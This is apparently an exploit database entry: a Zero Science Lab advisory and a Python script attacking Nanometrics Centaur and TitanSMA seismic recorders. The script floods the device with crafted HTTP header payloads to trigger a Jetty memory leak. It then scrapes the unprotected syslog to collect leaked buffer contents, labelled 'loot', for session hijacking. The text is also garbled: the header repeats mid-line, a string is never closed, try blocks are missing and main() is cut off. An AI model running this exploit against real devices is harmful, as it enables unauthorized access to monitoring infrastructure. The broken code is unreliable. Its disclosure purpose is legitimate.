# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak
# Date: 2020-02-15
# Author: byteGoblin
# Vendor: https://www.nanometrics.ca
# Product: https://www # Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak
# Date: 2020-02-15
# Author: byteGoblin
# Vendor: https://www.nanometrics.ca
# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma
# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
# CVE: N/A
# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit
# Vendor: Nanometrics Inc.
# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma
# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
# Affected versions:
# Centaur <= 4.3.23
# TitanSMA <= 4.2.20
# Summary:
# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists
# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.
# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and
# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for
# infrasound and similar geophysical sensor recording applications requiring sample rates up to
# 5000 sps.
# Summary:
# The TitanSMA is a strong motion accelerograph designed for high precision observational and
# structural engineering applications, where scientists and engineers require exceptional dynamic
# range over a wide frequency band.
# Description:
# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect
# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT)
# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.
# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage.
# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP
# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system
# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent
# packet) which can be combined to leak sensitive data which can be used to perform session hijacking
# and authentication bypass scenarios.
# Tested on:
# Jetty 9.4.z-SNAPSHOT
# Vulnerability discovered by:
# byteGoblin @ zeroscience.mk
# Advisory ID: ZSL-2020-5562
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
# Related CVE: CVE-2015-2080
# Related CWE: CWE-532, CWE-538
# 10.02.2020

#!/usr/bin/env python3

import requests
import re
import sys

class Goblin:
def __init__(self):
self.host = None
self.page = "/zsl"
self.syslog = "/logs/syslog"
self.buffer_pad = "A" * 70
self.buffer = None
self.payload = "xFF"
self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results
self.body = {}
self.headers = None
self.syslog_data = {}
self.last_line = None
self.before_last_line = True

def banner(self):
goblin = """
0;;::k000XN KxllokN
0;,:,;;;;:ldK Kdccc::oK
Kd:cllc'..';:ccclc,.x _ . ___ _ .
NOoc::c:,'';:ccllc::''k ___ , . _/_ ___ .' __. ___ | ` , __
Nklc:clccc;.;odoollc:',xN |/ | ` | .' ` | .' |/ | | |' `.
0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | |
0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \__/ `.___, `.___| `._.' `___,' /\__ / / |
Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \___/
Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed//
Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin
O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk
d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca
Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA
d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20
0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK
0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A
0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0
x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product
Xx:,'':xk:..,''lK Y k;';;';xX
XOkkko'.....'O d.';;,,:xN
0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._

def generate_payload(self, amount_of_bytes):
self.payload += "x00" * amount_of_bytes
self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload}

def read_syslog(self, initial=False):
# Read syslog remotely and filter out 'HeapByteBuffer' messages.
# 'initial' is used to make a 'snapshot' of the state before we send payloads...
# That way we can filter on what we've just sent.
print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog))
buffer = ""
r = requests.get(self.host + self.syslog)
if r.status_code == 200:
print("[!] - We got syslog, it is: {} bytes".format(len(r.content)))
split = r.text.split(" ")
for line in split:
if "HeapByteBuffer" in line:
if initial:
self.last_line = line
if line == self.last_line:
self.before_last_line = False
if not self.before_last_line:
buffer_addr = re.search("@w+", line).group(0).strip("@")
leak = re.search(">>>.+(?=...)", line).group(0).strip(">>>")
buffer += leak
except Exception as e:
if initial:
return self.last_line
self.buffer = buffer
else: # we can't access syslog?
print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...")
print("[!!!] - The status code we got was: {}".format(r.status_code))

def show_output(self):
# we need to translate ' ' into actual newlines
if self.buffer is not None and self.buffer is not "":
self.buffer = self.buffer.replace("\n", " ")
self.buffer = self.buffer.replace("\r", " ")
self.buffer = self.buffer.replace("%2f", "/")

print("[*] BUFFER LENGTH: {}".format(len(self.buffer)))
print("=" * 50)
print("[*] THIS IS THE LOOT")
print("=" * 50)
for num, x in enumerate(self.buffer.split(" ")):
print("{}. | {}".format(num, x))

def send_payload(self, amount):
print("[!] - Sending payloads to target: {}{}".format(self.host, self.page))
if amount > self.payloads_to_send or amount < 0:
amount = self.payloads_to_send
for num, x in enumerate(range(0, amount)):
if num % 10 == 0:
print("[!] - [{}/{}] payloads sent...".format(num, amount))
r = requests.post(self.host + self.page, data=self.body, headers=self.headers)
except Exception as e:
print("[!] - [{}/{}] payloads sent...".format(amount, amount))

def parse_sys_args(self):
if len(sys.argv) >= 2:
self.host = sys.argv[1]
if not "http" in self.host:
self.host = "http://{}".format(self.host)
if len(sys.argv) == 3:
# amount of packets to send
self.payloads_to_send = sys.argv[2]

def print_help(self):
print("Usage: {} <ip_addr[:port]> [amount of payloads to send]".format(sys.argv[0]))
print("Example: centaur3.py 123.456.789.0:8080 200")
print(" This will send 200 payloads to the aforementioned host")
print(" The [port] and [amount of payloads] are optional")

def main(self):
ll = self.read_syslog(initial=True)

if __name__ == '__main__':